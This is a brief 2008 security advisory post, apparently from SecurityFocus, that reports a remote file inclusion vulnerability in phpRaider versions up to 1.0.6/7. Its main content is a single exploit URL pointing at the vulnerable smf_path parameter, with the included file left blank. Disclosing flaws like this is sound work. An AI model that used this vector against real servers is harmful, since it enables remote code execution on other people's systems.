phpRaider <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable Jun 11 2008 02:06PM
none none com
--==+=================== | BiyoSecurity Team | =================+==--

--==+ phpRaider <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable +==--

--==+===================================================================
=================+==--

[+] [Greetz] + [BiyoSecurity.com] + [Coderx.org] + [NetDevilz.Co] + [Megaturks.net]

[+]Author : Crackers_Child

[+]Exploit : www.site.com/sc_path/authentication/smf/smf.functions.php?pConfig_auth[s
mf_path]=

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus